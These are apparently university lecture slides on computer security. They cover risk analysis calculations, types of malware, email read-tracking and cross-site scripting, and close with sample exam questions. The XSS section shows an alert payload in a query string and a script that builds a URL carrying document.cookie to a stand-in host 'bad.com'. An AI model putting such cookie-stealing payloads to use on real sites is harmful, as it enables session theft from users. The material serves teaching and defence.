Transcript Slide 1

Computer Security
Set of slides 7
Dr Alexei Vernitski
Risk analysis
• Quantitative risk analysis
• Qualitative risk analysis
Read more in textbooks, for example,
Pfleeger and Pfleeger, chapter “Administering
Security”
Risk analysis
• Step 1: identify assets
– There are many types of assets (data, hardware,
software, people, supplies, brand name,
infrastructure ...)
• Step 2: Determine vulnerabilities
– The list of security goals may be used to suggest
vulnerabilities: Confidentiality, Integrity,
Availability
Risk analysis
• Step 3: Estimate likelihood of exploitation
– Need to estimate the probability of exploitation of
vulnerability
– Can use data on frequency of attacks on specific
systems
– Often an expert analyst can help with this
• Step 4: Compute the loss in case of an attack
– Some are straightforward (e.g. cost of replacing piece
of standard hardware), some may be very difficult
– If recovery is possible, include also the cost of
recovery
Risk analysis
• Step 5: Select new controls
– For each vulnerability a suitable control is selected
– For example, see the matrix of vulnerabilities and
controls in Pfleeger and Pfleeger
• Step 6: Determine project savings
Example
• The input parameters are as follows:
• Asset and cost if lost:
– Data, cost to reconstruct if lost is £10 M
• Likelihood of loss of data (exploit)
– Probability of it is 5% (from expert knowledge)
• Control and cost: encrypted data store with replicated
off-site data storage using transaction based approach
to guarantee backup of each datum change.
– The cost of the solution is £1 M
• Effectiveness of control:
– Probability that the control is effective is 70%
Example
• The calculation is as follows (annual data):
• Expected loss without control: 0.05 × 10M = £0.5
M
• Expected loss with control: £0.5 M×0.3 = £0.15 M
• Cost of control and expected loss with control in
place:
• £0.15 M + £1.0 M = £1.15 M
• Finally the decision: the cost with the control
(£1.15 M) is larger than the cost without (£0.5 M)
• so decide not to use control
Example – for discussion
• (Pfleeger and Pfleeger, Table 8-7)
• Cost of reconstructing data, if lost: £1 M
• Likelihood of the loss of the data (per year):
10%
• Access control software is available which
costs £25 K and is effective in 60% of cases
• Should we buy this software?
Example – for discussion
• An organisation has 100 employees. Each of them uses a
laptop that costs £1000. In any one year there are likely to
be two employees that loose their laptops and need an
urgent replacement to carry out their work. The
organisation decides to buy one spare laptop (cost £1000
per year). This replacement is likely to be available and
useful in 80% of the cases of a loss (i.e. it may not have
specialist software installed which an employee needs
immediately, or the replacement laptop may be used by
another employee).
• Carry out each of the steps of a quantitative risk analysis.
• Carry out a cost/benefit analysis (if possible) and state if
the organisation should carry out the proposal.
• Most parameters are difficult of impossible to
evaluate:
– amount of loss for a given asset
– some valuable items (e.g. a human life)
– likelihood that a loss will occur
– cost of control
– effectiveness of control
• Why do we need risk analysis, even though
the numbers it produces are unreliable?
Risk analysis
• Quantitative risk analysis
uses costs and probabilities
• Qualitative risk analysis
uses non-numerical grades, for example
– Critical / very important / important / not important
– Very likely / likely / unlikely / very unlikely
• Which type of analysis would you
recommends, the quantitative or the
qualitative one?
Other types of malware
•
•
•
•
•
Viruses
Worms
Trojans
Rootkits
Trapdoors/backdoors
Trojans
• A trojan horse is a program that appears to
have some useful or benign purpose, but
really masks some hidden malicious
functionality
• Example:
http://www.softlate.com/
Trojans
• Unlike viruses, Trojan horses do not replicate
themselves
• Unlike viruses, which are just bad tricks, Trojan
horses usually attempt to do something useful
for their creator
• The main use of Trojans is to collect
information from your computer
• This is why they are called spyware
Example: W32/Sdbot-MA
• Each time W32/Sdbot-MA is run it attempts to
connect to a remote IRC server and join a specific
channel. The worm then runs in the background
allowing a remote intruder to issue commands
which control the computer.
• W32/Sdbot-MA can be instructed to download and
install programs on the infected computer, to flood
other computers with network packets and retrieve
system information including CD-keys for various
games.
(the information is taken from www.sophos.com)
Trojans’ behaviour
• Simple examples of typical behaviour of a
Trojan include:
• Attempting to send e-mail messages to its
creator
• Opening a TCP/IP port on your computer, to
allow its creator to connect to your computer
How Trojans collect information
• Keystroke trackers (also known as keystroke
recorders) – record what the user has typed
• Fake login screens – they emulate login to find
out your password
How Trojans collect information
• Garbage trackers – they look in the RAM or on
the disk for documents which might be
encrypted when they are stored in files
• 85% of documents edited yesterday can be
found in unused sectors of the hard drive
Protection against Trojans
• Before your computer is infected:
– Do not download software from untrusted
sources
• When your computer is infected:
– Checking logs
– Using sandboxes (what is a sandbox?)
– Using firewalls (what is a firewall?)
Worms
• A worm is a self-replicating piece of code that
spreads via networks and usually doesn’t
require human interaction to propagate.
• Example: Melissa virus from the previous
lecture could be also classified as a worm
Trapdoors/backdoors
• A backdoor is a is a secret entry point to a
program that otherwise operates normally. It
allows attackers to bypass normal security
controls, gaining access on the attacker’s own
terms.
• (this is the definition given with respect to one
separate program)
Backdoors (relative to one program)
Here,
a password
is checked
Here,
a password
is checked
And here,
the actual code
starts
Normally,
execution starts
at the beginning
of the program
And here,
the actual code
starts
However, a
hacker can start
the program at
some distance
from the
beginning, and
see what happens
Trapdoors/backdoors
• A backdoor is a is a program that allows
attackers to bypass normal security controls
on a system, gaining access on the attacker’s
own terms.
• (this is the definition given with respect to the
whole computer system)
Backdoors (relative to a computer)
First, check
the user’s
password
First, check
the user’s
password
After that,
allow the user
to work with
the data or
run programs
The normal
user’s work
session starts
here
After that,
allow the user
to work with
the data or
run programs
a hacker can start
a work session
bypassing
password check
Backdoors
• Remote execution of individual commands
• Remote command-line access
• Remote control of the GUI
Rootkit
• A rootkit is a set of tools that modify existing
operating system software so that an attacker
can keep access to and hide on the machine.
• We can say that rootkits install trojans and
backdoors – why?
Code in e-mail messages
• These are simple techniques which an attacker
can use; we consider them to prepare for
considering more complicated techniques of
cross-site scripting
• It is possible to include executable code (e.g.
JavaScript, VBA) in e-mail messages
• This can be used to collect information about the
receiver of the message
• In more dangerous cases, the code can affect the
work of the receiver’s computer
Code in e-mail messages
• Example: spammers check the validity of e-mail
addresses using HTML messages
• (this is referred to as ‘read tracking’, or also
look up ‘pixel tracking’)
• <html>
<body>
<img src=“www.spam.com/script.php?id=3495">
</body>
</html>
How spammers check the validity of e-mail
addresses
• The idea is as follows.
• The spammer generates a numbered list of e-mail
addresses, for example:
1 [email protected]
2 [email protected]
…………
3495 [email protected]
• The spammer sends a message to each address,
which includes the number of this address in the list
as an argument of a script
Code in e-mail messages
• <img src=“www.spam.com/script.php?id=3495">
client
The client on which asvern
checks his e-mail is lured into
asking the server to execute
script.php with an argument
id=3495
server
The script script.php is executed on the server
www.spam.com. This script can record that
asvern checks his e-mail, therefore, it is a valid email address
For discussion
• Before December 2013 Google Mail did not
show images in messages by default
• After December 2013, Google caches the
images on its servers before showing them to
the recipient
• What are the advantages and disadvantages
of this change?
• Discussed, for example, here:
https://threatpost.com/gmail-image-proxy-changes-have-privacy-security-implications/103192
Cross-site scripting (XSS)
• XSS comes in two broad forms, which have
these confusing names:
– non-permanent, or, reflective
– permanent
• In both forms the attacker uses some means
to send some code to a web server so that a
victim accesses the page and runs the code
thinking it comes from the “trusted” webserver rather than the attacker.
XSS: snippets of code
• Good examples of insecure pages:
http://www.insecurelabs.org/task
• ‘Hello world’ in Javascript:
<script>alert('hello world')</script>
• A query passed to the server and executed by the
client:
http://www.insecurelabs.org/task/Rule1?
query= <script>alert('hello world')</script>
• Instead of this simple script, a code stealing
cookies would be used by an attacker
XSS: a simplified example
• Suppose the attacker places the following
comment on a message board:
<SCRIPT type="text/javascript">
c = ‘bad.com/process.php?cookie=' +
escape(document.cookie);
</SCRIPT>
Sample exam questions
• Comment on the news item:
“Deniss Calovskis was named by the US as one of
the creators of the Gozi virus.
Security analyst Graham Cluley said Gozi was a
very successful trojan that pilfered huge sums
from bank accounts.”
• Comment on the news item:
“The suspected hackers allegedly placed back
doors, or code, to allow them to get back into
the systems later to steal confidential
information.”
Sample exam questions
• Explain exactly what the word ‘cross-site’
stands for in cross-site scripting (XSS).
• Experts in computer security distinguish
between permanent and non-permanent
cross-site scripting. Explain exactly what the
difference is between permanent and nonpermanent cross-site scripting.